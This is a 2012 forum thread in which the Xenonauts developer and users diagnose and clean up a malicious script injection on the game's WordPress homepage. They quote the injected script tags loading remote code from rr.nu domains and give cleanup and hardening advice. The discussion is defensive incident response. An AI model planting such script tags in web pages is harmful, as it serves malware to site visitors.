DrAtomic Posted February 22, 2012 Share Posted February 22, 2012 (edited) The Xenonauts homepage has been injected with a malicious url. Look at the parsed code and you'll find <script src="http://rie21rcom.rr.nu/mm.php?d=1"></script> at the end of the script. Most common causes are farmed FTP passwords or usage of opensource software that needs to be updated or usage of variables in custom code that arent checked against XSS. See http://www.acunetix.com to download a free scanner (the free scanner will highlight enough to see what needs to be fixed, clean the website first before running it though. Edited February 23, 2012 by DrAtomic Removed Fixed from header Quote Link to comment Share on other sites More sharing options...
Chris Posted February 22, 2012 Share Posted February 22, 2012 Argh, did not need this. I'm not a web guy. Thanks for the heads up, I'll see if I can find the security hole and fix it, and get the page back up... Quote Link to comment Share on other sites More sharing options...
Chris Posted February 22, 2012 Share Posted February 22, 2012 OK site appears to be restored and all major passwords are changed, plus the wordpress admin directory is changed from default. Hopefully that'll stop it happening again - but I'll have a play with Acunetix when it arrives. Thanks for the information! Quote Link to comment Share on other sites More sharing options...
DrAtomic Posted February 22, 2012 Author Share Posted February 22, 2012 OK site appears to be restored and all major passwords are changed, plus the wordpress admin directory is changed from default. Hopefully that'll stop it happening again - but I'll have a play with Acunetix when it arrives. Thanks for the information! You're welcome. Common cause outside of the website sources itself are farmed ftp accounts. Website wise; just be sure to be running the latest version of wordpress and also make sure to check if any plugins need updating (from your wp admin area). Quote Link to comment Share on other sites More sharing options...
gandie Posted February 22, 2012 Share Posted February 22, 2012 (edited) I am still getting sent to malicious sites when visiting this website, unfortunately... (was sent to another Russian site about a minute ago). Registered just to give a head's up (or was it my cache? hmmm - I would advise keeping an eye out anyway). Edited February 22, 2012 by gandie Quote Link to comment Share on other sites More sharing options...
DrAtomic Posted February 23, 2012 Author Share Posted February 23, 2012 It got injected again... <script src="http://chelpo94landsa.rr.nu/mm.php?d=1"></script> Quote Link to comment Share on other sites More sharing options...
Chris Posted February 23, 2012 Share Posted February 23, 2012 Wonderful. I've updated Wordpress to the latest version and changed my Wordpress password now too. I don't know what else could be causing it, because there's only one FTP user with access to the domain and I changed the password on that yesterday. I hope it doesn't happen again. Quote Link to comment Share on other sites More sharing options...
Chris Posted February 23, 2012 Share Posted February 23, 2012 Hmmm, even that doesn't seem to be working. I installed a heavy-duty Wordpress security plugin, hopefully that'll prevent further intrusion... But according to http://sitecheck.sucuri.net/scanner/, I still have malicious code on the website. Anyone know a method for how I can find and remove it? Quote Link to comment Share on other sites More sharing options...
DrAtomic Posted February 23, 2012 Author Share Posted February 23, 2012 (edited) Hmmm, even that doesn't seem to be working. I installed a heavy-duty Wordpress security plugin, hopefully that'll prevent further intrusion...But according to http://sitecheck.sucuri.net/scanner/, I still have malicious code on the website. Anyone know a method for how I can find and remove it? *. Check the modification date of your index.php (since it got infected again) to check what the last time of getting infected was/is. *. Download all the webfiles to your local computer *. Search for the string '.rr.nu' in all files *. Clean all files that contain <script src="http://blablablablabla.rr.nu/mm.php?d=1"></script>; the string will be added to the bottom of the files, so open file, scroll to bottom, delete. *. Check the content of your .htaccess (could contain a malicious rewrite rule) and make sure it is what it should be. If unsure or if you never modified the original then simply delete it and replace it with an original that comes with the wordpress sources. My guess is that you do use url rewrite (search engine friendly urls based *. Run a virus scanner over the downloaded code (this will find any files that may have been uploaded that reinfest the website). *. Make sure to run a maleware scanner on your own computer as well. *. Once everything is clean again, reset your passwords again just to be sure. Edited February 23, 2012 by DrAtomic Quote Link to comment Share on other sites More sharing options...
yawa Posted February 23, 2012 Share Posted February 23, 2012 It might have been this vulnerability, as I see you have the Timthumb plugin: http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/ That page is a very good writeup, and explains the possibility that they may have installed a backdoor - even if you have fixed how they got in the first time, they may have installed another way. It seems to be pretty common with Wordpress hacks to use a php based backdoor. DrAtomic's advice to run a virus scanner on the server is a good idea in my opinion. Sadly detection of php malware generally isn't as good as for exe stuff. DrAtomic's advice sounds very good to me so I'm going to leave him to it, but I do have one question: you say you updated Wordpress, did you update all the plugins, too? I saw a very large number of exploited Wordpress sites at work today (AV industry), via some gallery plugin that lives in a directory named fgallery. Good luck! This kind of hack is normally automated, so once you do clear out the traces they're not likely to come back. Quote Link to comment Share on other sites More sharing options...
Chris Posted February 23, 2012 Share Posted February 23, 2012 Ah god dammit. I think Timthumb is integrated into the site template. I'm not sure I can disable or upgrade it. *sigh* Thanks for the advice guys, I'll see what I can do. Quote Link to comment Share on other sites More sharing options...
Chris Posted February 23, 2012 Share Posted February 23, 2012 Right, I've closed the timthumb vulnerability (sure enough, that file was out of date so it's a potential entry point) and I'll do the virus scans etc, then change my passwords. Fingers crossed this fixes the issue! Quote Link to comment Share on other sites More sharing options...
MrPyro Posted February 24, 2012 Share Posted February 24, 2012 I'm now getting a 500 Internal Server error trying to access the page. This is probably a PHP Fatal Error, so if you have PHP error logging enabled it should give you some info in that log as to what is going on; or Wordpress might have its own logging. Quote Link to comment Share on other sites More sharing options...
Chris Posted February 24, 2012 Share Posted February 24, 2012 That's intentional. I'm wiping the site and rolling it back to when I last did a backup of it. Quote Link to comment Share on other sites More sharing options...
DrAtomic Posted February 24, 2012 Author Share Posted February 24, 2012 Sadly detection of php malware generally isn't as good as for exe stuff. Very true, reason I said it though was to eliminate any php shells that might have been uploaded. Most of those are detected by AV software. Quote Link to comment Share on other sites More sharing options...
Chris Posted February 24, 2012 Share Posted February 24, 2012 I couldn't get that to work. In the end I took the nuclear option and wiped the site, then restored a backup I took in January. I then applied all the security fixes, which should hopefully close the original vulnerabilities, and updated my passwords. It appears to have fixed the issue. Thank god for backups, eh? Quote Link to comment Share on other sites More sharing options...
resonansER Posted February 24, 2012 Share Posted February 24, 2012 I wrote to you, Chris. Let's I'll be administrator. I am easy identified by Internet. I am an adult, honest and decent admin. I know very well how to work with vBulletin and also administration unix-system CentOs 6.x & Debian 6.x X64 - X86, and many, many, many other things. Quote Link to comment Share on other sites More sharing options...
gsteff Posted February 25, 2012 Share Posted February 25, 2012 I'm still getting malware warnings from Google Chrome when I visit the news page. Quote Link to comment Share on other sites More sharing options...
Clausewitz_ Posted February 28, 2012 Share Posted February 28, 2012 got a malware warning @ work yesterday and 5 mins later a techy turned up in my office going yadda yadda yadda company policy yadda yadda yadda! Are we users in any danger of being compromised - I used the link to pre-order? cheers Quote Link to comment Share on other sites More sharing options...
Chris Posted February 29, 2012 Share Posted February 29, 2012 Erk - shouldn't be...what pages gave you the malware warning, out of interest? Quote Link to comment Share on other sites More sharing options...
RavenX Posted March 3, 2012 Share Posted March 3, 2012 Chris, you've been checking naughty Russian sites for mail order brides again haven't you? J/K I've got some friends that do web security work if need be. Just say the word and can give you the name of a good company that provides site security. Quote Link to comment Share on other sites More sharing options...
Chris Posted March 9, 2012 Share Posted March 9, 2012 I think I've done a pretty good job of dealing with the malware, but I'm still getting occasional reports of people encountering warnings from the site (even though I've scanned the whole thing for the problem script and found nothing). The vulnerability only affects IE and people have mentioned encountering it on the Screenshot and Pre-Order pages so far (I've had some problems with script errors on the screenshot page when I open a screenshot). If anyone knows anything about web security, would they mind having a look at that page to see if they can replicate the malware warnings? I can't seem to do it myself so I don't really know what to look for... Quote Link to comment Share on other sites More sharing options...
Gorlom Posted March 9, 2012 Share Posted March 9, 2012 Would those users haveing cached pages cause such errors/warnings? (Just wondering I know practically nothing about all of this) Quote Link to comment Share on other sites More sharing options...
Greven Posted April 3, 2012 Share Posted April 3, 2012 (edited) I am taking a look. Not sure if I will be able to find anything. EDIT: I cannot find anything at the moment...but I will do more of a check once I am out of training and home. Edited April 3, 2012 by Greven Update Quote Link to comment Share on other sites More sharing options...
Chris Posted April 4, 2012 Share Posted April 4, 2012 I think it's all been clear for a while now. I certainly hope it stays that way Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.